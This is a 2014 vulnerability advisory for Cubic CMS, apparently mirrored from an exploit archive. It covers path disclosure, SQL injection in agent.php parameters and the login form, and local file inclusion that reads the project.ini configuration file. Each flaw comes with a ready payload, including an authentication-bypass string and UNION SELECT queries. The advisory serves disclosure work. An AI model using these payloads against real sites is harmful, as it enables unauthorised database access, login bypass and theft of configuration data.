Cubic CMS SQL Injection / LFI / Path Disclosure

Cubic CMS SQL Injection / LFI / Path Disclosure: Posted Jan 3, 2014; Authored by Eugenio Delfa; Cubic CMS suffers from local file inclusion, path disclosure, and remote SQL injection vulnerabilities.; tags | exploit, remote, local, vulnerability, sql injection, file inclusion, info disclosure; SHA-256 | fad0b2849fc2664a2d60a42389ae4cd27f62f22d247cfafdc36cbf89fa7d4bb3; Download | Favorite | View

Cubic CMS SQL Injection / LFI / Path Disclosure

I. BACKGROUND
-------------------------
"CUBIC CMS" is a non-free content management system for websites and 
portals of any size, powerful, adaptable to any graphic design that 
allows users administration 100% professional but simple at the same 
time that website.

II. VULNERABILITIES
-------------------------

II.i FULL PATH DISCLOSURE
-------------------------
CUBIC CMS presents a full path disclosure in the 'Controller Not Found' 
exception management, due to an incorrect 'Software Exception' management.

Syntax: 
  http://www.example.com/id/-22
  http://www.example.com/foo.bar

II.ii SQL Injection
-------------------------
CUBIC CMS presents a SQL Injection in its 'resource_id' and 'version_id' parameters 
on his '/recursos/agent.php' (Resources Management Module) script via GET HTTP 
Method, due to an insufficient sanitization on user supplied data.

Syntax:  
  http://www.example.com/recursos/agent.php?resource_id=-11 OR 'foobar' UNION SELECT user()-- -
  http://www.example.com/recursos/agent.php?version_id=-22 OR '' UNION SELECT @@version-- -

II.iii SQL Injection
-------------------------
CUBIC CMS presents a SQL Injection in its 'login' and 'pass' parameters on his 
'/login.usuario' (Users Management Module) script via POST HTTP Method, due to an 
insufficient sanitization on user supplied data.

Syntax:  
  login=Administrator&pass=foobar') or ('1'='1

II.iv Local File Inclusion
-------------------------
CUBIC CMS presents a SQL Injection in its 'path' parameter on his 
'/recursos/agent.php' (Resources Management Module) script via GET HTTP Method, 
due to an insufficient sanitization on user supplied data.

Syntax:  
  http://www.example.com/recursos/agent.php?path=/../../application/config/project.ini

IV. REFERENCES
-------------------------
http://www.proyectosbds.com
http://www.cubicfactory.com/

V. DISCLOSURE TIMELINE
-------------------------
- March 28, 2012: First Vendor Contact.
- Dec 30, 2013: Second Vendor Contact (Still waiting for responses).

VI. CREDITS
-------------------------
This vulnerability has been discovered
by Eugenio Delfa <ed (at) isbox (dot) org>.

Top Authors In Last 30 Days

Red Hat 228 files
Ubuntu 55 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Google Security Research 6 files
Apple 6 files
Milad Karimi 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,333)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,578)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,460)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

Cubic CMS SQL Injection / LFI / Path Disclosure

Cubic CMS SQL Injection / LFI / Path Disclosure

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Cubic CMS SQL Injection / LFI / Path Disclosure

Share This

Cubic CMS SQL Injection / LFI / Path Disclosure

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems